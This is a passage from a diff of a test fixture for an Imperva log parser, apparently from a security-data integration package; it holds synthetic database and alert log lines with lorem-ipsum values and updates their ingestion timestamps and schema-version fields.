"%IMPERVA-Imperva,alert#=sperna,event#=eabilloi,createTime=2016-04-09 
17:22:51,updateTime=estia,alertSev=medium,group=tlab,ruleName=\"volupt\",evntDesc=\"osqui\",category=xerc,disposition=iutali,eventType=fdeFi,proto=igmp,srcPort=1696,srcIP=10.179.124.125,dstPort=5473,dstIP=10.36.194.106,policyName=\"eprehend\",occurrences=2462,httpHost=dutper,webMethod=lamcolab,url=\"https://example.net/tlabo/uames.gif?mpo=offi#giatnu\",webQuery=\"ulapa\",soapAction=liqui,resultCode=quioffi,sessionID=uptate,username=ncidid,addUsername=quaturve,responseTime=sequa,responseSize=aera,direction=outbound,dbUsername=rvel,queryGroup=uid,application=\"onsecte\",srcHost=eratv6205.internal.lan,osUsername=reme,schemaName=acommod,dbName=uaUteni,hdrName=udantium,action=accept", "event": { - "ingested": "2021-06-09T11:17:04.825772100Z" + "ingested": "2021-12-14T14:46:55.618547431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.129.149.43,dstPort=3304,dbUsername=eveli,srcIP=10.211.105.204,srcPort=2742,creatTime=2016-04-24 00:25:25,srvGroup=aliquide,service=ofde,appName=equat,event#=derit,eventType=Logout,usrGroup=dexea,usrAuth=True,application=\"atcu\",osUsername=labor,srcHost=didunt1355.corp,dbName=udan,schemaName=orema,bindVar=invento,sqlError=failure,respSize=6855,respTime=74.098000,affRows=nofdeFin,action=\"accept\",rawQuery=\"rau\"", "event": { - "ingested": "2021-06-09T11:17:04.825777700Z" + "ingested": "2021-12-14T14:46:55.618547896Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.214.191.180,dstPort=5848,dbUsername=ipsumdol,srcIP=10.112.250.193,srcPort=5705,creatTime=2016-05-08 
07:27:59,srvGroup=urerepr,service=ese,appName=isaute,event#=ptatemq,eventType=Logout,usrGroup=luptatev,usrAuth=False,application=\"tlabore\",osUsername=Exc,srcHost=pora6854.www5.home,dbName=nevo,schemaName=ide,bindVar=aali,sqlError=success,respSize=6852,respTime=49.573000,affRows=etcons,action=\"cancel\",rawQuery=\"tenbyCi\"", "event": { - "ingested": "2021-06-09T11:17:04.825782800Z" + "ingested": "2021-12-14T14:46:55.618548298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.251.20.13,dstPort=264,dbUsername=iquipe,srcIP=10.192.34.76,srcPort=1450,creatTime=2016-05-22 14:30:33,srvGroup=upida,service=tvolupt,appName=eufugi,event#=pici,eventType=abor,usrGroup=utpe,usrAuth=onsequ,application=\"temqu\",osUsername=ovol,srcHost=ptasn6599.www.localhost,dbName=lore,schemaName=tnonpro,bindVar=ionemu,sqlError=success,respSize=3645,respTime=20.909000,affRows=tanimid,action=\"deny\",rawQuery=\"uamni\"", "event": { - "ingested": "2021-06-09T11:17:04.825788600Z" + "ingested": "2021-12-14T14:46:55.618548693Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.74.105.218,dstPort=2438,dbUsername=archite,srcIP=10.59.138.212,srcPort=7829,creatTime=2016-06-05 21:33:08,srvGroup=asi,service=datatno,appName=siutali,event#=amnih,eventType=Logout,usrGroup=ium,usrAuth=True,application=\"esciuntN\",osUsername=idunt,srcHost=ptasnu6684.mail.lan,dbName=orumSe,schemaName=boree,bindVar=intoc,sqlError=success,respSize=248,respTime=158.450000,affRows=eeufugia,action=\"block\",rawQuery=\"ofdeFini\"", "event": { - "ingested": "2021-06-09T11:17:04.825793500Z" + "ingested": "2021-12-14T14:46:55.618549077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,dstIP=10.168.159.13,dstPort=3319,dbUsername=inci,srcIP=10.230.173.4,srcPort=2631,creatTime=2016-06-20 04:35:42,srvGroup=avol,service=icero,appName=xer,event#=emipsumd,eventType=Logout,usrGroup=isisten,usrAuth=False,application=\"cusant\",osUsername=atemq,srcHost=rinre2977.api.corp,dbName=totamre,schemaName=isnostr,bindVar=umqu,sqlError=success,respSize=6135,respTime=86.668000,affRows=inesci,action=\"accept\",rawQuery=\"uia\"", "event": { - "ingested": "2021-06-09T11:17:04.825799600Z" + "ingested": "2021-12-14T14:46:55.618549462Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.49.167.57,dstPort=2119,dbUsername=tali,srcIP=10.41.21.204,srcPort=3540,creatTime=4 July 2016 11:38:16,srvGroup=rpori,service=ice,appName=oles,event#=edic,eventType=Login,usrGroup=seq,usrAuth=True,application=\"tutlab\",osUsername=sau,srcHost=atevelit2450.local,dbName=aperia,schemaName=ccaeca,bindVar=umdolo,sqlError=failure,respSize=6818,respTime=115.224000,affRows=stenatu,action=\"block\",rawQuery=\"orumSe\"", "event": { - "ingested": "2021-06-09T11:17:04.825804400Z" + "ingested": "2021-12-14T14:46:55.618550091Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=dutp,event#=psaquaea,createTime=2016-07-18 
18:40:50,updateTime=taevita,alertSev=high,group=siut,ruleName=\"tconsect\",evntDesc=\"aquae\",category=boreetdo,disposition=aturve,eventType=ditemp,proto=ipv6,srcPort=3406,srcIP=10.216.125.252,dstPort=5592,dstIP=10.62.147.186,policyName=\"eumiure\",occurrences=4603,httpHost=ima,webMethod=quasia,url=\"https://example.org/umwrit/uptate.html?ctetura=aveni#elit\",webQuery=\"seosqui\",soapAction=sequamni,resultCode=uradi,sessionID=tot,username=llamco,addUsername=nea,responseTime=psum,responseSize=tasnulap,direction=inbound,dbUsername=umSe,queryGroup=xeacomm,application=\"cinge\",srcHost=itla658.api.localhost,osUsername=lorsita,schemaName=dolore,dbName=uptate,hdrName=quidexea,action=\"accept\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825809200Z" + "ingested": "2021-12-14T14:46:55.618550483Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ate,event#=odoconse,createTime=2016-08-02 01:43:25,updateTime=emp,alertSev=very-high,group=veli,ruleName=\"tenim\",evntDesc=\"rumet\",category=verita,disposition=sectet,eventType=etdo,proto=tcp,srcPort=3689,srcIP=10.52.125.9,dstPort=2538,dstIP=10.204.128.215,policyName=\"ama\",occurrences=332,httpHost=runtmol,webMethod=texpli,url=\"https://api.example.org/roidents/tem.txt?tametcon=liqua#mvele\",webQuery=\"isis\",soapAction=uasiar,resultCode=utlab,sessionID=emUteni,username=rum,addUsername=gnaaliqu,responseTime=teirured,responseSize=onemulla,direction=external,dbUsername=bor,queryGroup=rauto,application=\"ationev\",srcHost=umdolor4389.api.home,osUsername=paquioff,schemaName=nci,dbName=isau,hdrName=rautodi,action=deny", "event": { - "ingested": "2021-06-09T11:17:04.825813800Z" + "ingested": "2021-12-14T14:46:55.618550877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,dstIP=10.200.68.129,dstPort=2558,dbUsername=icabo,srcIP=10.34.148.166,srcPort=3022,creatTime=2016-08-16 08:45:59,srvGroup=preh,service=ercit,appName=etMal,event#=qua,eventType=rsita,usrGroup=ate,usrAuth=ipsamvo,application=\"onula\",osUsername=miu,srcHost=rationev6444.localhost,dbName=tatem,schemaName=untutlab,bindVar=amcor,sqlError=failure,respSize=5427,respTime=176.685000,affRows=oremq,action=\"block\",rawQuery=\"uisaute\"", "event": { - "ingested": "2021-06-09T11:17:04.825818400Z" + "ingested": "2021-12-14T14:46:55.618551281Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.226.101.180,dstPort=1000,dbUsername=siu,srcIP=10.134.5.40,srcPort=7284,creatTime=30 August 2016 15:48:33,srvGroup=llamc,service=nte,appName=mvel,event#=nof,eventType=Login,usrGroup=usmodi,usrAuth=False,application=\"mvolu\",osUsername=conse,srcHost=ipi7727.www5.domain,dbName=isiu,schemaName=licabo,bindVar=enimadmi,sqlError=success,respSize=6356,respTime=41.238000,affRows=xeaco,action=\"deny\",rawQuery=\"amcor\"", "event": { - "ingested": "2021-06-09T11:17:04.825822800Z" + "ingested": "2021-12-14T14:46:55.618551671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.126.26.131,dstPort=2595,dbUsername=velite,srcIP=10.30.98.10,srcPort=7576,creatTime=13 September 2016 22:51:07,srvGroup=itation,service=sequatD,appName=nimave,event#=isciv,eventType=Login,usrGroup=rroqu,usrAuth=False,application=\"nofd\",osUsername=dipisci,srcHost=spernatu5539.domain,dbName=quunt,schemaName=olori,bindVar=mquae,sqlError=unknown,respSize=7717,respTime=96.729000,affRows=cidunt,action=\"accept\",rawQuery=\"borisnis\"", "event": { - "ingested": "2021-06-09T11:17:04.825827500Z" + "ingested": "2021-12-14T14:46:55.618552255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.190.10.219,dstPort=5530,dbUsername=accusant,srcIP=10.233.120.207,srcPort=136,creatTime=2016-09-28 05:53:42,srvGroup=stenatu,service=inibu,appName=est,event#=uptatemU,eventType=Logout,usrGroup=leumiu,usrAuth=False,application=\"tla\",osUsername=item,srcHost=nimid372.api.corp,dbName=atcupid,schemaName=quamnih,bindVar=dminima,sqlError=success,respSize=3278,respTime=60.949000,affRows=tame,action=\"cancel\",rawQuery=\"reetd\"", "event": { - "ingested": "2021-06-09T11:17:04.825832100Z" + "ingested": "2021-12-14T14:46:55.618552643Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=sitam,createTime=2016-10-12 12:56:16,eventType=rad,eventSev=low,username=sequa,subsystem=iosamnis,message=\"volupt\"", "event": { - "ingested": "2021-06-09T11:17:04.825837Z" + "ingested": "2021-12-14T14:46:55.618553063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.100.98.56,dstPort=1089,dbUsername=boru,srcIP=10.248.184.200,srcPort=5315,creatTime=2016-10-26 19:58:50,srvGroup=ptatem,service=ptatevel,appName=tenatuse,event#=psaqua,eventType=Logout,usrGroup=ullamcor,usrAuth=False,application=\"itationu\",osUsername=proident,srcHost=maliquam2147.internal.home,dbName=lores,schemaName=ritati,bindVar=orisni,sqlError=failure,respSize=5923,respTime=179.541000,affRows=sitam,action=\"deny\",rawQuery=\"mmodoc\"", "event": { - "ingested": "2021-06-09T11:17:04.825841700Z" + "ingested": "2021-12-14T14:46:55.618553488Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.197.6.245,dstPort=27,dbUsername=dtempo,srcIP=10.82.28.220,srcPort=3570,creatTime=10 November 2016 
03:01:24,srvGroup=imad,service=tinvolup,appName=tsed,event#=inv,eventType=Login,usrGroup=rroq,usrAuth=False,application=\"rcit\",osUsername=aecatcup,srcHost=olabor2983.internal.localhost,dbName=citatio,schemaName=oluptat,bindVar=mveniamq,sqlError=success,respSize=3071,respTime=120.142000,affRows=eaqueips,action=\"allow\",rawQuery=\"aturve\"", "event": { - "ingested": "2021-06-09T11:17:04.825846900Z" + "ingested": "2021-12-14T14:46:55.618553938Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.6.27.103,dstPort=3179,dbUsername=redol,srcIP=10.167.252.183,srcPort=2003,creatTime=24 November 2016 10:03:59,srvGroup=doei,service=cipitl,appName=caboNemo,event#=dexerc,eventType=Login,usrGroup=strumex,usrAuth=True,application=\"eprehend\",osUsername=asnu,srcHost=hitec2111.mail.corp,dbName=perspici,schemaName=ationul,bindVar=mquisn,sqlError=failure,respSize=6606,respTime=155.907000,affRows=emUte,action=\"cancel\",rawQuery=\"ccae\"", "event": { - "ingested": "2021-06-09T11:17:04.825852100Z" + "ingested": "2021-12-14T14:46:55.618554324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ntNe,event#=itanim,createTime=2016-12-08 
17:06:33,updateTime=nesciun,alertSev=medium,group=mollita,ruleName=\"tatem\",evntDesc=\"iae\",category=quido,disposition=emip,eventType=inBC,proto=tcp,srcPort=6165,srcIP=10.88.45.111,dstPort=6735,dstIP=10.81.184.7,policyName=\"saquaea\",occurrences=6344,httpHost=eetd,webMethod=illu,url=\"https://mail.example.com/lorsi/repreh.gif?sitamet=utlabo#tetur\",webQuery=\"tionula\",soapAction=ritqu,resultCode=ecatcupi,sessionID=uamei,username=undeomni,addUsername=tas,responseTime=autfugi,responseSize=tasun,direction=external,dbUsername=eratv,queryGroup=ipsa,application=\"asuntexp\",srcHost=adminim2559.www5.invalid,osUsername=lmole,schemaName=iameaque,dbName=nderi,hdrName=ssusci,action=\"deny\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825863700Z" + "ingested": "2021-12-14T14:46:55.618554711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.214.3.140,dstPort=6127,dbUsername=scipitl,srcIP=10.29.119.245,srcPort=1179,creatTime=2016-12-23 00:09:07,srvGroup=olli,service=rever,appName=ore,event#=offici,eventType=Logout,usrGroup=ection,usrAuth=False,application=\"roquisqu\",osUsername=edolorin,srcHost=dolorem6882.api.local,dbName=rsi,schemaName=taliqui,bindVar=mides,sqlError=success,respSize=5140,respTime=119.229000,affRows=tcu,action=\"cancel\",rawQuery=\"inrepreh\"", "event": { - "ingested": "2021-06-09T11:17:04.825869Z" + "ingested": "2021-12-14T14:46:55.618555206Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=dipiscin,event#=olup,createTime=2017-01-06 
07:11:41,updateTime=aco,alertSev=medium,group=accusa,ruleName=\"natu\",evntDesc=\"liquid\",category=enim,disposition=Finibus,eventType=radi,proto=rdp,srcPort=2064,srcIP=10.218.123.234,dstPort=57,dstIP=10.110.133.7,policyName=\"radipisc\",occurrences=5347,httpHost=nibus,webMethod=vitaed,url=\"https://example.org/etconsec/elillum.htm?mporinc=onsectet#idolo\",webQuery=\"atemUte\",soapAction=docon,resultCode=mdolore,sessionID=eosquira,username=pta,addUsername=snos,responseTime=orsi,responseSize=tetura,direction=external,dbUsername=lorsita,queryGroup=eavol,application=\"osamnis\",srcHost=temaccu5302.test,osUsername=etconsec,schemaName=caboNem,dbName=urExcept,hdrName=rumetMal,action=\"allow\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825873700Z" + "ingested": "2021-12-14T14:46:55.618555599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.105.190.170,dstPort=2519,dbUsername=doeiu,srcIP=10.182.152.242,srcPort=1877,creatTime=2017-01-20 14:14:16,srvGroup=orumw,service=redol,appName=ecillum,event#=isci,eventType=Logout,usrGroup=dolor,usrAuth=True,application=\"tiumto\",osUsername=litan,srcHost=nder347.www.corp,dbName=alorum,schemaName=mquisn,bindVar=atq,sqlError=unknown,respSize=3474,respTime=68.556000,affRows=ugiatquo,action=\"block\",rawQuery=\"equamnih\"", "event": { - "ingested": "2021-06-09T11:17:04.825878100Z" + "ingested": "2021-12-14T14:46:55.618556001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=citati,event#=uamei,createTime=2017-02-03 
21:16:50,updateTime=eursinto,alertSev=low,group=tutla,ruleName=\"licaboNe\",evntDesc=\"tautfug\",category=giatquov,disposition=olu,eventType=rmagnido,proto=ipv6-icmp,srcPort=7647,srcIP=10.59.188.188,dstPort=7082,dstIP=10.123.166.197,policyName=\"ici\",occurrences=7102,httpHost=mips,webMethod=itae,url=\"https://internal.example.net/atnula/ditautf.jpg?iquidex=olup#remipsu\",webQuery=\"tan\",soapAction=quiac,resultCode=sunt,sessionID=autfugit,username=emUte,addUsername=iusmodi,responseTime=fdeFi,responseSize=Except,direction=inbound,dbUsername=equat,queryGroup=aliquid,application=\"usantiu\",srcHost=idunt4633.internal.host,osUsername=liquam,schemaName=min,dbName=oluptat,hdrName=odt,action=block", "event": { - "ingested": "2021-06-09T11:17:04.825882800Z" + "ingested": "2021-12-14T14:46:55.618556402Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.72.75.207,dstPort=6336,dbUsername=urau,srcIP=10.201.168.116,srcPort=2037,creatTime=2017-02-18 04:19:24,srvGroup=utali,service=sed,appName=xeac,event#=umdolors,eventType=Logout,usrGroup=lumdo,usrAuth=False,application=\"acom\",osUsername=eFini,srcHost=ectob4634.mail.localhost,dbName=prehend,schemaName=eufug,bindVar=roquisq,sqlError=unknown,respSize=3348,respTime=79.765000,affRows=civelits,action=\"accept\",rawQuery=\"reet\"", "event": { - "ingested": "2021-06-09T11:17:04.825887300Z" + "ingested": "2021-12-14T14:46:55.618556787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.9.46.123,dstPort=586,dbUsername=mfu,srcIP=10.58.133.175,srcPort=1634,creatTime=4 March 2017 
11:21:59,srvGroup=llumq,service=tenim,appName=eiusmo,event#=ainc,eventType=Login,usrGroup=miurerep,usrAuth=True,application=\"lestia\",osUsername=nde,srcHost=snu6436.www.local,dbName=texplica,schemaName=oco,bindVar=aboree,sqlError=unknown,respSize=3795,respTime=14.713000,affRows=edquian,action=\"block\",rawQuery=\"uames\"", "event": { - "ingested": "2021-06-09T11:17:04.825891900Z" + "ingested": "2021-12-14T14:46:55.618557168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.169.50.59,dstPort=7693,dbUsername=pta,srcIP=10.70.29.203,srcPort=5994,creatTime=18 March 2017 18:24:33,srvGroup=piciatis,service=destla,appName=fugitse,event#=minimve,eventType=Login,usrGroup=serrorsi,usrAuth=False,application=\"tametco\",osUsername=mquisnos,srcHost=lore7099.www.host,dbName=isn,schemaName=veniamq,bindVar=lup,sqlError=unknown,respSize=2358,respTime=94.460000,affRows=ipitlabo,action=\"block\",rawQuery=\"prehen\"", "event": { - "ingested": "2021-06-09T11:17:04.825896900Z" + "ingested": "2021-12-14T14:46:55.618557569Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.165.182.111,dstPort=5525,dbUsername=ames,srcIP=10.137.85.123,srcPort=218,creatTime=2017-04-02 01:27:07,srvGroup=amquisno,service=modoc,appName=magnam,event#=uinesc,eventType=Logout,usrGroup=cid,usrAuth=True,application=\"emi\",osUsername=Bonorum,srcHost=lesti6939.api.local,dbName=idu,schemaName=sis,bindVar=idolo,sqlError=success,respSize=6401,respTime=171.434000,affRows=its,action=\"block\",rawQuery=\"edutp\"", "event": { - "ingested": "2021-06-09T11:17:04.825901Z" + "ingested": "2021-12-14T14:46:55.618558060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=enimadmi,createTime=2017-04-16 
08:29:41,eventType=tateveli,eventSev=high,username=sumdolo,subsystem=idolorem,message=\"temvele\"", "event": { - "ingested": "2021-06-09T11:17:04.825905Z" + "ingested": "2021-12-14T14:46:55.618558442Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=inimve,event#=uio,createTime=2017-04-30 15:32:16,updateTime=mexercit,alertSev=high,group=onofdeF,ruleName=\"ibusBo\",evntDesc=\"orin\",category=enia,disposition=iavol,eventType=natuserr,proto=rdp,srcPort=3327,srcIP=10.64.184.196,dstPort=6659,dstIP=10.173.178.109,policyName=\"tatemse\",occurrences=4493,httpHost=amqui,webMethod=lamco,url=\"https://www.example.net/hender/ptatemU.htm?mquisnos=tnulapa#madmi\",webQuery=\"tlabore\",soapAction=idunt,resultCode=expl,sessionID=olore,username=uian,addUsername=atuserro,responseTime=madminim,responseSize=tobeata,direction=inbound,dbUsername=ioff,queryGroup=oinBCS,application=\"itsedd\",srcHost=upt6017.api.localdomain,osUsername=nesci,schemaName=tam,dbName=sin,hdrName=idexeac,action=\"block\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825909400Z" + "ingested": "2021-12-14T14:46:55.618558835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.90.50.149,dstPort=1936,dbUsername=olu,srcIP=10.168.225.209,srcPort=6,creatTime=2017-05-14 22:34:50,srvGroup=taliq,service=tautfugi,appName=fdeFinib,event#=uip,eventType=Logout,usrGroup=ectobea,usrAuth=True,application=\"dat\",osUsername=aUtenima,srcHost=turQuis4046.api.test,dbName=deomnisi,schemaName=olupta,bindVar=oll,sqlError=success,respSize=1127,respTime=55.870000,affRows=evelite,action=\"block\",rawQuery=\"iav\"", "event": { - "ingested": "2021-06-09T11:17:04.825913400Z" + "ingested": "2021-12-14T14:46:55.618559230Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { 
- "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.59.182.36,dstPort=5792,dbUsername=mtota,srcIP=10.18.150.82,srcPort=6648,creatTime=29 May 2017 05:37:24,srvGroup=rit,service=eumfu,appName=lors,event#=oluptat,eventType=Login,usrGroup=enimad,usrAuth=True,application=\"tis\",osUsername=qua,srcHost=con6049.internal.lan,dbName=quelaud,schemaName=luptat,bindVar=rinrep,sqlError=unknown,respSize=6112,respTime=135.357000,affRows=nimv,action=\"allow\",rawQuery=\"tconse\"", "event": { - "ingested": "2021-06-09T11:17:04.825917600Z" + "ingested": "2021-12-14T14:46:55.618559719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=rem,createTime=2017-06-12 12:39:58,eventType=ulamcola,eventSev=very-high,username=llita,subsystem=ntsunt,message=\"nturmag\"", "event": { - "ingested": "2021-06-09T11:17:04.825923700Z" + "ingested": "2021-12-14T14:46:55.618560197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.228.229.144,dstPort=3236,dbUsername=ametcons,srcIP=10.151.240.35,srcPort=3197,creatTime=2017-06-26 19:42:33,srvGroup=roquisq,service=uasi,appName=maveniam,event#=uis,eventType=lill,usrGroup=remeum,usrAuth=mmod,application=\"taevit\",osUsername=ama,srcHost=tatnonp1371.www.invalid,dbName=xercit,schemaName=lam,bindVar=asnu,sqlError=failure,respSize=4325,respTime=168.492000,affRows=eriam,action=\"cancel\",rawQuery=\"aquae\"", "event": { - "ingested": "2021-06-09T11:17:04.825927700Z" + "ingested": "2021-12-14T14:46:55.618560586Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.242.48.203,dstPort=1102,dbUsername=ese,srcIP=10.147.142.242,srcPort=2586,creatTime=2017-07-11 
02:45:07,srvGroup=eca,service=ctionofd,appName=mpori,event#=olupt,eventType=Logout,usrGroup=ola,usrAuth=False,application=\"ptat\",osUsername=quasi,srcHost=tium3542.internal.invalid,dbName=squamest,schemaName=quisn,bindVar=pteu,sqlError=success,respSize=3970,respTime=11.548000,affRows=antium,action=\"block\",rawQuery=\"velillum\"", "event": { - "ingested": "2021-06-09T11:17:04.825931800Z" + "ingested": "2021-12-14T14:46:55.618560965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=lapari,event#=Mal,createTime=2017-07-25 09:47:41,updateTime=itinvo,alertSev=very-high,group=paq,ruleName=\"emipsumq\",evntDesc=\"culpaq\",category=quamq,disposition=usan,eventType=tdolo,proto=ipv6,srcPort=4723,srcIP=10.213.165.165,dstPort=3787,dstIP=10.254.10.98,policyName=\"adipisc\",occurrences=7365,httpHost=tasnul,webMethod=uptasn,url=\"https://example.net/itati/oidentsu.gif?eporroqu=aturve#temqui\",webQuery=\"lup\",soapAction=aeca,resultCode=isau,sessionID=giat,username=ttenb,addUsername=eirure,responseTime=boreetd,responseSize=tNe,direction=outbound,dbUsername=eeufug,queryGroup=ntin,application=\"iades\",srcHost=radipis3991.mail.invalid,osUsername=civeli,schemaName=eufugia,dbName=utlabore,hdrName=tamr,action=\"cancel\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.825935700Z" + "ingested": "2021-12-14T14:46:55.618561348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=onemul,createTime=2017-08-08 16:50:15,eventType=trudexe,eventSev=very-high,username=ura,subsystem=oreeufug,message=\"Quisa\"", "event": { - "ingested": "2021-06-09T11:17:04.825939400Z" + "ingested": "2021-12-14T14:46:55.618561801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,alert#=llitani,event#=uscipit,createTime=2017-08-22 23:52:50,updateTime=luptat,alertSev=very-high,group=etco,ruleName=\"iuntN\",evntDesc=\"utfugi\",category=ursintoc,disposition=tio,eventType=mmodicon,proto=ipv6,srcPort=5439,srcIP=10.116.1.130,dstPort=3402,dstIP=10.169.28.157,policyName=\"exeacomm\",occurrences=1295,httpHost=ionula,webMethod=pexeaco,url=\"https://api.example.org/uamqua/Neq.gif?eumiu=nim#pteurs\",webQuery=\"ercitati\",soapAction=atem,resultCode=serro,sessionID=lumquid,username=eturadip,addUsername=amquaera,responseTime=rsitamet,responseSize=leumiur,direction=internal,dbUsername=utod,queryGroup=olesti,application=\"edquia\",srcHost=ihi7294.www5.localhost,osUsername=reseo,schemaName=amco,dbName=ons,hdrName=onsecte,action=\"accept\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825943200Z" + "ingested": "2021-12-14T14:46:55.618562191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.29.138.31,dstPort=5871,dbUsername=volupta,srcIP=10.45.69.152,srcPort=4083,creatTime=6 September 2017 06:55:24,srvGroup=emi,service=uaerat,appName=iduntu,event#=samvol,eventType=Login,usrGroup=equa,usrAuth=False,application=\"apari\",osUsername=tsunt,srcHost=caecat4920.api.host,dbName=enim,schemaName=umq,bindVar=sistena,sqlError=failure,respSize=744,respTime=33.416000,affRows=temquia,action=\"deny\",rawQuery=\"eumiu\"", "event": { - "ingested": "2021-06-09T11:17:04.825946900Z" + "ingested": "2021-12-14T14:46:55.618562575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.152.213.228,dstPort=3387,dbUsername=ptatev,srcIP=10.100.113.11,srcPort=6971,creatTime=2017-09-20 
